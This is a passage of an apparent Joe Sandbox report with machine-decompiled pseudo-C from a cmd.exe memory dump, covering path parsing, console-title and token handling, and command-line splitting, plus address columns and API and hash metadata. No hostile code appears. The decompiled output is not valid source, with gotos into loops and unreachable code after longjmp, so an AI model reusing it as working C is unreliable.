								_t144 =  *0x1213cc0;
								E011E36CB(_t110, _t118,  *0x1213cc0,  *_t149 & 0x0000ffff);
							}
						}
						if( *0x120b8b0 != 0) {
							goto L45;
						}
						goto L18;
					}
					_t144 = 0x5c;
					if( *_t149 == _t144) {
						__eflags = _t149[1] - _t144;
						if(__eflags != 0) {
							goto L12;
						}
						_t126 = _t149;
						_t24 =  &(_t126[1]); // 0x2
						_v60 = _t24;
						do {
							_t82 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t82;
						} while (_t82 != 0);
						_v72 = (_t126 - _v60 >> 1) + 1;
						_t29 =  &(_t149[2]); // 0x4
						_t85 = wcschr(_t29, _t144);
						_v60 = _t85;
						__eflags = _t85;
						if(_t85 != 0) {
							_t134 = 0x5c;
							_t102 = wcschr( &(_t85[0]), _t134);
							_v60 = _t102;
							__eflags = _t102;
							if(_t102 != 0) {
								_t103 = GetFileAttributesW(_t149);
								__eflags = _t103 - 0xffffffff;
								if(_t103 != 0xffffffff) {
									_t104 = _v60;
									 *_t104 = 0;
									_t105 = _t104 + 2;
									__eflags = _t105;
									_v60 = _t105;
								} else {
									_t106 = GetLastError();
									 *0x120b8b0 = _t106;
									__eflags = _t106 - 2;
									if(_t106 == 2) {
										 *0x120b8b0 = 3;
									}
								}
							}
						}
						_t86 = 0x5a;
						_v56 = _t86;
						_t118 = 0x3a;
						_v54 = _t118;
						__eflags = 0;
						_v52 = 0;
						_v104 = 1;
						_v92 =  &_v56;
						_v88 = _t149;
						_v80 = 0;
						while(1) {
							__eflags =  *0x120b8b0;
							if(__eflags != 0) {
								goto L45;
							}
							__eflags = _v56 - 0x41;
							if(__eflags == 0) {
								goto L12;
							}
							_v16 = 0;
							_t89 = E011E7797(_t118);
							__eflags = _t89;
							if(_t89 == 0) {
								 *0x120b8b0 = 0x78;
							} else {
								 *0x120b8b0 =  *0x121c030( &_v108, 0, 0, 0);
							}
							_v16 = 0xfffffffe;
							_t90 =  *0x120b8b0;
							__eflags = _t90;
							if(_t90 == 0) {
								_t144 = _v56;
								 *((short*)( *0x1213ce8 +  *0x1213ce4 * 8 - 4)) = _v56;
								 *_t149 = _v56;
								_t149[1] = _v54;
								_t132 = 0x5c;
								_t149[2] = _t132;
								_t118 =  &(_v68[3]);
								_t94 = _v60;
								__eflags = _v60;
								if(__eflags == 0) {
									 *_t118 = 0;
								} else {
									_t144 = _v72;
									E011E1040(_t118, _v72, _t94);
								}
								goto L12;
							} else {
								__eflags = _t90 - 0x55;
								if(_t90 == 0x55) {
									L41:
									_v56 = (_v56 & 0x000000ff) - 1;
									 *0x120b8b0 = 0;
									continue;
								}
								__eflags = _t90 - 0x4b2;
								if(_t90 != 0x4b2) {
									continue;
								}
								goto L41;
							}
						}
						goto L45;
					}
					goto L12;
				} else {
					_t138 = _t149;
					_t163 =  *_t149;
					L3:
					_v60 = _t65;
					if(_t163 != 0) {
						_t65 = _t138;
						_t138 =  &(_t138[1]);
						__eflags =  *_t138;
						goto L3;
					}
					L4:
					while(_t65 > _t149 && iswspace( *_t65 & 0x0000ffff) != 0) {
						_t109 = _v60;
						 *_t109 = 0;
						_t65 = _t109 - 2;
						_v60 = _t65;
					}
					goto L6;
				}
			}


























































                                    0x011e5e53
                                    0x011e5e55
                                    0x011e5e56
                                    0x011e5e5a
                                    0x011e5e61
                                    0x011e5e65
                                    0x011e5e67
                                    0x011e5e69
                                    0x011e5e6e
                                    0x011e5e79
                                    0x011e5e7a
                                    0x011e5e7b
                                    0x011e5e7c
                                    0x011e5e80
                                    0x011e5e85
                                    0x011e5e88
                                    0x011e5e8a
                                    0x011e5e8f
                                    0x011e5e93
                                    0x011e5e99
                                    0x011e5eb0
                                    0x011e5eb5
                                    0x011e5eb7
                                    0x011e5eba
                                    0x011e5ec6
                                    0x011e5ef3
                                    0x011e5ef3
                                    0x011e5ef5
                                    0x011e5ef5
                                    0x011e5ef8
                                    0x011e5ef8
                                    0x011e5efb
                                    0x011e5efe
                                    0x011e5f07
                                    0x011e5f0c
                                    0x011e5f15
                                    0x011e5f16
                                    0x011e5f18
                                    0x011e5f1d
                                    0x011e5f26
                                    0x011ef393
                                    0x011e5f9c
                                    0x011e5fa4
                                    0x011e5fac
                                    0x011e5fad
                                    0x011e5fbe
                                    0x011e5fbe
                                    0x011e5f33
                                    0x011ef55a
                                    0x011ef55b
                                    0x011ef560
                                    0x011ef560
                                    0x011ef566
                                    0x00000000
                                    0x011ef570
                                    0x011e5f40
                                    0x011e5f4e
                                    0x011e5f4e
                                    0x011e5f55
                                    0x011ef53d
                                    0x011ef53d
                                    0x011ef54b
                                    0x011ef551
                                    0x011ef552
                                    0x00000000
                                    0x011ef552
                                    0x011e5f5b
                                    0x011e5f5d
                                    0x011e5f5f
                                    0x011e5f64
                                    0x011e5f6b
                                    0x011e5f6f
                                    0x011e5f74
                                    0x011e5f7e
                                    0x011e5fc1
                                    0x011e5fc1
                                    0x011e5f84
                                    0x011e5f8a
                                    0x011e5f8a
                                    0x011e5f74
                                    0x011e5f96
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e5f96
                                    0x011e5f44
                                    0x011e5f48
                                    0x011ef39d
                                    0x011ef3a1
                                    0x00000000
                                    0x00000000
                                    0x011ef3a7
                                    0x011ef3a9
                                    0x011ef3ac
                                    0x011ef3af
                                    0x011ef3af
                                    0x011ef3b2
                                    0x011ef3b5
                                    0x011ef3b5
                                    0x011ef3c2
                                    0x011ef3c6
                                    0x011ef3ca
                                    0x011ef3d2
                                    0x011ef3d5
                                    0x011ef3d7
                                    0x011ef3db
                                    0x011ef3e1
                                    0x011ef3e9
                                    0x011ef3ec
                                    0x011ef3ee
                                    0x011ef3f1
                                    0x011ef3f7
                                    0x011ef3fa
                                    0x011ef41a
                                    0x011ef41d
                                    0x011ef420
                                    0x011ef420
                                    0x011ef423
                                    0x011ef3fc
                                    0x011ef3fc
                                    0x011ef402
                                    0x011ef407
                                    0x011ef40a
                                    0x011ef40c
                                    0x011ef40c
                                    0x011ef40a
                                    0x011ef3fa
                                    0x011ef3ee
                                    0x011ef428
                                    0x011ef429
                                    0x011ef42f
                                    0x011ef430
                                    0x011ef434
                                    0x011ef436
                                    0x011ef43a
                                    0x011ef444
                                    0x011ef447
                                    0x011ef44a
                                    0x011ef44d
                                    0x011ef44d
                                    0x011ef454
                                    0x00000000
                                    0x00000000
                                    0x011ef45a
                                    0x011ef45f
                                    0x00000000
                                    0x00000000
                                    0x011ef465
                                    0x011ef468
                                    0x011ef46d
                                    0x011ef46f
                                    0x011ef485
                                    0x011ef471
                                    0x011ef47e
                                    0x011ef47e
                                    0x011ef48f
                                    0x011ef4c0
                                    0x011ef4c5
                                    0x011ef4c7
                                    0x011ef4ee
                                    0x011ef4fd
                                    0x011ef506
                                    0x011ef50d
                                    0x011ef513
                                    0x011ef514
                                    0x011ef51b
                                    0x011ef51e
                                    0x011ef521
                                    0x011ef523
                                    0x011ef535
                                    0x011ef525
                                    0x011ef526
                                    0x011ef529
                                    0x011ef529
                                    0x00000000
                                    0x011ef4c9
                                    0x011ef4c9
                                    0x011ef4cc
                                    0x011ef4d9
                                    0x011ef4df
                                    0x011ef4e3
                                    0x00000000
                                    0x011ef4e3
                                    0x011ef4ce
                                    0x011ef4d3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ef4d3
                                    0x011ef4c7
                                    0x00000000
                                    0x011ef44d
                                    0x00000000
                                    0x011e5ec8
                                    0x011e5ec8
                                    0x011e5eca
                                    0x011e5ed7
                                    0x011e5ed7
                                    0x011e5eda
                                    0x011e5ecf
                                    0x011e5ed1
                                    0x011e5ed4
                                    0x00000000
                                    0x011e5ed4
                                    0x00000000
                                    0x011e5edc
                                    0x011ef382
                                    0x011ef385
                                    0x011ef388
                                    0x011ef38b
                                    0x011ef38b
                                    0x00000000
                                    0x011e5edc

                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011E5EE4
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID:
                                    • API String ID: 3458554142-0
                                    • Opcode ID: 2f347b8b191ff2ab8cbf37c7dcaed0dd981b1f1bb93bcb850c433d11c379fef6
                                    • Instruction ID: 010b64fdb8a305bacb96ac5723d9e6f551a3aa69f37ae9c0de960ea80e4a7937
                                    • Opcode Fuzzy Hash: 2f347b8b191ff2ab8cbf37c7dcaed0dd981b1f1bb93bcb850c433d11c379fef6
                                    • Instruction Fuzzy Hash: A991C174904A05DEEB2DDFA8E84CAAEBBF5FF58714F10811EE805D7294EB304541CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB2B0, Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E011DB2B0(WCHAR* __ecx, signed int _a4) {
				signed int _v12;
				long _v536;
				wchar_t* _v540;
				wchar_t* _v544;
				wchar_t* _v548;
				signed int _v552;
				WCHAR* _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				long _t35;
				void* _t38;
				short _t47;
				wchar_t* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				signed int _t54;
				WCHAR* _t55;
				signed int _t62;
				intOrPtr* _t63;
				WCHAR* _t70;
				intOrPtr _t77;
				wchar_t* _t79;
				WCHAR* _t80;
				wchar_t* _t81;
				signed int _t82;

				_t65 = __ecx;
				_t32 =  *0x11fd0b4; // 0x2833377e
				_v12 = _t32 ^ _t82;
				_t62 = _a4;
				_t76 =  &_v544;
				_v552 = _t62;
				_v548 = 0;
				_v540 = 0;
				_t35 = E011DB42E( &_v544);
				if(_t35 < 0) {
					SetLastError(RtlNtStatusToDosError(_t35));
					L23:
					if(_t62 == 0) {
						_t62 = 0;
						_t80 = 0;
						L12:
						if(_t80 != 0) {
							SetConsoleTitleW(_t80);
							 *0x11fd59c = _t62;
						}
						L14:
						_t77 = 0;
						if(_v548 == 0) {
							L17:
							_t38 = _v540;
							if(_t38 != 0) {
								LocalFree(_t38);
							}
							if(_t77 != 0) {
								L29:
								_push(0);
								_push(8);
								E011DC5A2(_t65);
								goto L20;
							} else {
								L20:
								return E011E6FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
							}
						}
						L15:
						if(_t80 != 0) {
							_t65 = _t80;
							E011E0040(_t80);
						}
						goto L17;
					}
					_t65 =  *(_t62 + 0x3c);
					_t80 = E011DDEF9( *(_t62 + 0x3c));
					if(_t80 == 0) {
						goto L14;
					}
					_t70 = _t80;
					_t62 = 0;
					_t21 =  &(_t70[1]); // 0x2
					_t76 = _t21;
					do {
						_t47 =  *_t70;
						_t70 =  &(_t70[1]);
					} while (_t47 != 0);
					_t65 = _t70 - _t76 >> 1;
					if(_t70 - _t76 >> 1 < 0x104) {
						goto L12;
					}
					_t77 = 1;
					goto L29;
				}
				_t48 = _v544;
				if(_t48 >= 3) {
					_t48 = _t48 + 0xfffffff0;
				}
				if(_t48 != 0) {
					goto L23;
				} else {
					_t49 = _t48 + 1;
					_t77 = _t49;
					_v548 = _t49;
					_v560 = _t77;
					_t50 = E011DB3FC(_t65);
					_v540 = _t50;
					_t65 = 0x40002748;
					if(_t50 == 0) {
						goto L29;
					} else {
						_t63 = _t50;
						_t76 = 0;
						_t11 = _t63 + 2; // 0x2
						_t65 = _t11;
						do {
							_t51 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t51 != 0);
						_t62 = _t63 - _t65 >> 1;
						if(_t62 >= 0x104) {
							goto L17;
						}
						_t65 = 0x208;
						_t80 = E011E00B0(0x208);
						_v556 = _t80;
						if(_t80 == 0) {
							goto L17;
						}
						_t76 = 0x104;
						_t65 = _t80;
						E011E1040(_t80, 0x104, _v540);
						_t54 = _v552;
						if(_t54 == 0) {
							_t55 =  &_v536;
							_v544 = _t55;
							if(GetConsoleTitleW(_t55, 0x104) == 0) {
								goto L15;
							}
							if(wcsstr( &_v536, _v540) == 0) {
								L36:
								_t76 = 0x104;
								_t65 = _t80;
								if(E011E18C0(_t80, 0x104, _v544) != 0) {
									goto L15;
								}
								L11:
								_t62 = 0;
								goto L12;
							}
							_t79 = _v540;
							_t81 =  &_v536;
							_t62 = _t62 + _t62;
							do {
								_t81 = _t81 + _t62;
							} while (wcsstr(_t81, _t79) != 0);
							_t77 = _v560;
							_v544 = _t81;
							_t80 = _v556;
							goto L36;
						}
						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
							_t65 = 0;
							_t77 = 0;
							goto L15;
						}
						_t76 = 0x104;
						_t65 = _t80;
						if(E011E18C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
							goto L15;
						}
						goto L11;
					}
				}
			}
































                                    0x011db2b0
                                    0x011db2bb
                                    0x011db2c2
                                    0x011db2c6
                                    0x011db2c9
                                    0x011db2d2
                                    0x011db2d9
                                    0x011db2df
                                    0x011db2e5
                                    0x011db2ec
                                    0x011f1346
                                    0x011f134c
                                    0x011f134e
                                    0x011f142c
                                    0x011f142e
                                    0x011db3a0
                                    0x011db3a2
                                    0x011db3a5
                                    0x011db3ab
                                    0x011db3ab
                                    0x011db3b1
                                    0x011db3b3
                                    0x011db3bb
                                    0x011db3c8
                                    0x011db3c8
                                    0x011db3d0
                                    0x011db3d3
                                    0x011db3d3
                                    0x011db3db
                                    0x011f138b
                                    0x011f138d
                                    0x011f138e
                                    0x011f1390
                                    0x00000000
                                    0x011db3e1
                                    0x011db3e1
                                    0x011db3f3
                                    0x011db3f3
                                    0x011db3db
                                    0x011db3bd
                                    0x011db3bf
                                    0x011db3c1
                                    0x011db3c3
                                    0x011db3c3
                                    0x00000000
                                    0x011db3bf
                                    0x011f1354
                                    0x011f135c
                                    0x011f1360
                                    0x00000000
                                    0x00000000
                                    0x011f1366
                                    0x011f1368
                                    0x011f136a
                                    0x011f136a
                                    0x011f136d
                                    0x011f136d
                                    0x011f1370
                                    0x011f1373
                                    0x011f137a
                                    0x011f1382
                                    0x00000000
                                    0x00000000
                                    0x011f138a
                                    0x00000000
                                    0x011f138a
                                    0x011db2f2
                                    0x011db2fb
                                    0x011f139c
                                    0x011f139c
                                    0x011db303
                                    0x00000000
                                    0x011db309
                                    0x011db309
                                    0x011db30a
                                    0x011db30c
                                    0x011db317
                                    0x011db31d
                                    0x011db322
                                    0x011db328
                                    0x011db32b
                                    0x00000000
                                    0x011db331
                                    0x011db331
                                    0x011db333
                                    0x011db335
                                    0x011db335
                                    0x011db338
                                    0x011db338
                                    0x011db33b
                                    0x011db33e
                                    0x011db345
                                    0x011db34d
                                    0x00000000
                                    0x00000000
                                    0x011db34f
                                    0x011db359
                                    0x011db35b
                                    0x011db363
                                    0x00000000
                                    0x00000000
                                    0x011db36b
                                    0x011db370
                                    0x011db372
                                    0x011db377
                                    0x011db37f
                                    0x011f13a4
                                    0x011f13b0
                                    0x011f13be
                                    0x00000000
                                    0x00000000
                                    0x011f13db
                                    0x011f140d
                                    0x011f1413
                                    0x011f1418
                                    0x011f1421
                                    0x00000000
                                    0x00000000
                                    0x011db39e
                                    0x011db39e
                                    0x00000000
                                    0x011db39e
                                    0x011f13dd
                                    0x011f13e3
                                    0x011f13e9
                                    0x011f13eb
                                    0x011f13eb
                                    0x011f13f7
                                    0x011f13fb
                                    0x011f1401
                                    0x011f1407
                                    0x00000000
                                    0x011f1407
                                    0x011db389
                                    0x011db3f6
                                    0x011db3f8
                                    0x00000000
                                    0x011db3f8
                                    0x011db38e
                                    0x011db393
                                    0x011db39c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011db39c
                                    0x011db32b

                                    APIs
                                      • Part of subcall function 011DB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 011DB448
                                      • Part of subcall function 011DB42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 011DB460
                                      • Part of subcall function 011DB42E: NtClose.NTDLL(00000000), ref: 011DB4B1
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 011DB3A5
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011DB3D3
                                    • RtlNtStatusToDosError.NTDLL ref: 011F133F
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1346
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 011F13B6
                                    • wcsstr.MSVCRT ref: 011F13D1
                                    • wcsstr.MSVCRT ref: 011F13EF
                                      • Part of subcall function 011DB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,011F95EF,011E9564,00000001,?), ref: 011DB421
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                    • String ID:
                                    • API String ID: 1313749407-0
                                    • Opcode ID: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                    • Instruction ID: f37d632e44a7e370380b39cf19f060590834647b2277249efc6ea4713143e61b
                                    • Opcode Fuzzy Hash: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                    • Instruction Fuzzy Hash: A5512A31A0821AABDF2C9FB99C987AE77A4EF55314F1500ADDE06D7244DF30CE818B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE9A0, Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E011DE9A0(long __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				long _t64;
				wchar_t* _t66;
				signed char _t67;
				signed int _t68;
				int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				long _t75;
				void* _t78;
				long _t83;
				void* _t86;
				void* _t92;
				signed int* _t95;
				int _t97;
				long _t99;
				wchar_t* _t101;
				wchar_t* _t104;
				wchar_t* _t106;
				wchar_t* _t109;
				long _t111;
				wchar_t* _t114;
				signed int _t117;
				void* _t118;
				signed short* _t123;
				long _t124;
				long _t125;
				signed int _t138;
				void* _t139;
				long _t142;
				signed int _t146;
				void* _t149;
				signed int _t152;
				long _t153;
				void* _t157;
				signed int _t159;
				signed int* _t160;
				signed int _t163;
				void* _t164;
				void* _t168;
				void* _t171;
				signed short* _t173;
				long _t174;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t183;
				signed int _t184;
				void* _t188;

				_t173 = __ecx;
				_t121 = 0x50;
				_push(_t160);
				_t114 = E011E00B0(0x50);
				if(_t114 == 0) {
					E011F9287(0x50);
					__imp__longjmp(0x120b8b8, 1);
					goto L91;
				} else {
					 *_t114 = __ecx;
					_t114[0x10] = 0;
					_t121 =  *0x120fa8c +  *0x120fa8c;
					_t111 = E011E00B0( *0x120fa8c +  *0x120fa8c);
					if(_t111 == 0) {
						L91:
						E011F9287(_t121);
						__imp__longjmp(0x120b8b8, 1);
						asm("int3");
						E011F9287(_t121);
						__imp__longjmp(0x120b8b8, 1);
						E011F9287(_t121);
						__imp__longjmp(0x120b8b8, 1);
						L94:
						while(1) {
							if(E011DD7D4(_t114,  *_t173) != 0) {
								L17:
								 *(_t184 - 0xdc) = 0;
								if(_t114 == 0) {
									L19:
									 *_t160 =  *_t173;
									_t160 =  &(_t160[0]);
									if( *_t173 == 0x22) {
										while(1) {
											_t62 = _t173[1];
											_t123 = _t173;
											_t173 =  &(_t173[1]);
											 *_t160 = _t62;
											_t160 =  &(_t160[0]);
											_t63 =  *_t173 & 0x0000ffff;
											if(_t63 == 0) {
												break;
											}
											if(_t63 == 0x22) {
												goto L20;
											} else {
												if(_t173[1] != 0) {
													continue;
												} else {
													goto L20;
												}
											}
											goto L22;
										}
										_t173 = _t123;
									}
									L20:
									 *(_t184 - 0xd8) = 0;
								} else {
									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
									_t188 = _t188 + 8;
									if(_t66 != 0) {
										_t67 =  *(_t184 + 8);
										if((_t67 & 0x00000002) != 0) {
											_t68 =  *_t173 & 0x0000ffff;
											if( *(_t184 - 0xd8) == 0) {
												_t160 =  &(_t160[0]);
											}
											 *_t160 = _t68;
											 *(_t184 - 0xd8) = 1;
											_t160 =  &(_t160[1]);
										} else {
											if((_t67 & 0x00000004) != 0) {
												 *_t160 =  *_t173;
											}
											 *(_t184 - 0xd8) = 0;
											_t160 =  &(_t160[0]);
										}
									} else {
										goto L19;
									}
								}
								_t64 = _t173[1] & 0x0000ffff;
								_t173 =  &(_t173[1]);
								_t124 = _t64;
								if(_t64 != 0) {
									goto L14;
								}
							} else {
								L29:
								_t75 =  *_t173 & 0x0000ffff;
								if(_t75 != 0) {
									_t142 = _t75;
									while(_t142 != 0x22) {
										_t97 = iswspace(_t142);
										_t188 = _t188 + 4;
										if(_t97 != 0) {
											L39:
											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
												L42:
												if( *(_t184 - 0xe4) != 0) {
													if(E011DD7D4(_t114,  *_t173) != 0) {
														break;
													} else {
														goto L43;
													}
												} else {
													L43:
													_t99 = _t173[1] & 0x0000ffff;
													_t173 =  &(_t173[1]);
													_t142 = _t99;
													if(_t99 != 0) {
														continue;
													} else {
													}
												}
											} else {
												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
												_t188 = _t188 + 8;
												if(_t101 != 0) {
													break;
												} else {
													goto L42;
												}
											}
										} else {
											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
											if(_t104 != 0) {
												goto L39;
											} else {
												break;
											}
										}
										goto L22;
									}
									if( *_t173 != 0) {
										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
											_t160 =  &(_t160[0]);
										}
										 *(_t184 - 0xd8) = 1;
										goto L17;
										do {
											do {
												do {
													do {
														goto L17;
														L14:
													} while (_t124 == 0x22);
													_t70 = iswspace(_t124);
													_t188 = _t188 + 4;
													if(_t70 != 0) {
														break;
													} else {
														goto L16;
													}
													goto L22;
													L16:
													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
													_t188 = _t188 + 8;
												} while (_t109 == 0);
												_t71 =  *(_t184 + 8);
												if((_t71 & 0x00000001) != 0) {
													goto L54;
												} else {
													L25:
													_t72 = _t71 & 0x00000002;
													 *(_t184 - 0xe0) = _t72;
													if(_t72 == 0 || _t114 == 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
												goto L22;
												L54:
											} while ( *(_t184 - 0xdc) == 0);
											goto L25;
											L27:
											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
										} while (_t106 != 0);
										L28:
										_t74 =  *(_t184 + 8) & 0x00000004;
										 *(_t184 - 0xe4) = _t74;
										if(_t74 != 0) {
											continue;
										} else {
											goto L29;
										}
									}
								}
							}
							L22:
							_t125 =  *(_t184 - 0xe8);
							_t163 = _t160 - _t125 >> 1;
							_t148 = 4 + _t163 * 2;
							if(E011E0100(_t125, 4 + _t163 * 2) == 0) {
								E011F9287(_t125);
								__imp__longjmp(0x120b8b8, 1);
								asm("int3");
								while(1) {
									L100:
									_t149 = _t125 + 2;
									do {
										_t78 =  *_t125;
										_t125 = _t125 + 2;
									} while (_t78 != 0);
									_t164 = _t163 + (_t125 - _t149 >> 1);
									while(1) {
										L64:
										_t128 = _t164 + _t164;
										_t174 = E011E00B0(_t164 + _t164);
										 *(_t184 - 4) = _t174;
										if(_t174 == 0) {
											break;
										}
										_t130 = _t114[0xf];
										if(_t114[0xf] != 0) {
											E011E1040(_t174, _t164, _t130);
										}
										_t86 = 0;
										if(_t164 == 0 || _t164 > 0x7fffffff) {
											_t86 = 0x80070057;
										}
										if(_t86 < 0) {
											L107:
											_t152 = 0;
										} else {
											_t86 = 0;
											_t139 = _t164;
											_t153 = _t174;
											if(_t164 == 0) {
												L106:
												_t86 = 0x80070057;
												goto L107;
											} else {
												while( *_t153 != _t86) {
													_t153 = _t153 + 2;
													_t139 = _t139 - 1;
													if(_t139 != 0) {
														continue;
													} else {
														goto L106;
													}
													goto L73;
												}
												if(_t139 == 0) {
													goto L106;
												} else {
													_t152 = _t164 - _t139;
												}
											}
										}
										L73:
										if(_t86 >= 0) {
											_t95 =  *(_t184 - 4) + _t152 * 2;
											_t179 = _t164 - _t152;
											if(_t179 == 0) {
												L79:
												_t95 = _t95 - 2;
											} else {
												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
												_t164 = 0x120faa0 - _t95;
												while(_t157 != 0) {
													_t138 =  *(_t164 + _t95) & 0x0000ffff;
													if(_t138 == 0) {
														break;
													} else {
														 *_t95 = _t138;
														_t157 = _t157 - 1;
														_t95 =  &(_t95[0]);
														_t179 = _t179 - 1;
														if(_t179 != 0) {
															continue;
														} else {
															goto L79;
														}
													}
													goto L81;
												}
												if(_t179 == 0) {
													goto L79;
												}
											}
											L81:
											_t174 =  *(_t184 - 4);
											 *_t95 = 0;
										}
										_t114[0xf] = _t174;
										while(E011DEEC8() != 0) {
											if(E011DF030(1) == 0x4000) {
												_t125 = _t114[0xf];
												_t163 =  *0x120fa8c;
												if(_t125 != 0) {
													goto L100;
												}
												goto L64;
											} else {
												_t177 =  *(_t184 - 8);
												if(E011E02B0(_t114, _t177, _t164, _t177) != 0) {
													_t92 =  *_t177;
													do {
														_t51 = _t92 + 0x14; // 0x14
														_t117 = _t51;
														_t92 =  *_t117;
														 *(_t184 - 8) = _t117;
													} while (_t92 != 0);
													_t114 =  *(_t184 - 0x10);
													continue;
												} else {
													E011DF300(_t91, 0, 0, _t91);
													break;
												}
											}
											goto L112;
										}
										_t114[0xd] =  *(_t184 - 0xc);
										return _t114;
										goto L112;
									}
									E011F9287(_t128);
									__imp__longjmp(0x120b8b8, 1);
									asm("int3");
									if( *0x120fa90 != 0) {
										E011F82EB(_t128);
									}
									 *0x11fd5c8 = 0;
									if( *0x120fa88 != 0) {
										E011F8121(_t174, 0);
									}
									_t83 = _t174;
									return _t83;
									goto L112;
								}
							} else {
								_pop(_t168);
								_pop(_t180);
								_pop(_t118);
								return E011E6FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
							}
							goto L112;
						}
					} else {
						_t159 =  *0x120fa8c;
						_t114[0xe] = _t111;
						if(_t159 != 0) {
							if(_t159 > 0x7fffffff) {
								if(_t159 != 0) {
									goto L10;
								}
							} else {
								_t183 = 0x7ffffffe - _t159;
								_t171 = 0x120faa0 - _t111;
								while(_t183 + _t159 != 0) {
									_t146 =  *(_t171 + _t111) & 0x0000ffff;
									if(_t146 == 0) {
										break;
									} else {
										 *_t111 = _t146;
										_t111 = _t111 + 2;
										_t159 = _t159 - 1;
										if(_t159 != 0) {
											continue;
										} else {
											L8:
											_t111 = _t111 - 2;
										}
									}
									L10:
									 *_t111 = 0;
									goto L11;
								}
								if(_t159 == 0) {
									goto L8;
								}
								goto L10;
							}
						}
						L11:
						return _t114;
					}
				}
				L112:
			}

























































                                    0x011de9a4
                                    0x011de9a6
                                    0x011de9ab
                                    0x011de9b1
                                    0x011de9b5
                                    0x011ec018
                                    0x011ec024
                                    0x00000000
                                    0x011de9bb
                                    0x011de9c0
                                    0x011de9c2
                                    0x011de9c9
                                    0x011de9cc
                                    0x011de9d3
                                    0x011ec02a
                                    0x011ec02a
                                    0x011ec036
                                    0x011ec03c
                                    0x011ec03d
                                    0x011ec049
                                    0x011ec04f
                                    0x011ec05b
                                    0x00000000
                                    0x011ec061
                                    0x011ec06d
                                    0x011deb5a
                                    0x011deb5a
                                    0x011deb66
                                    0x011deb7e
                                    0x011deb81
                                    0x011deb84
                                    0x011deb8b
                                    0x011decf0
                                    0x011decf0
                                    0x011decf4
                                    0x011decf6
                                    0x011decf9
                                    0x011decfc
                                    0x011decff
                                    0x011ded05
                                    0x00000000
                                    0x00000000
                                    0x011ded0a
                                    0x00000000
                                    0x011ded10
                                    0x011ded15
                                    0x00000000
                                    0x011ded17
                                    0x00000000
                                    0x011ded17
                                    0x011ded15
                                    0x00000000
                                    0x011ded0a
                                    0x011ded6e
                                    0x011ded6e
                                    0x011deb91
                                    0x011deb91
                                    0x011deb68
                                    0x011deb6d
                                    0x011deb73
                                    0x011deb78
                                    0x011deccd
                                    0x011decd2
                                    0x011ded23
                                    0x011ded26
                                    0x011ded69
                                    0x011ded69
                                    0x011ded28
                                    0x011ded2e
                                    0x011ded38
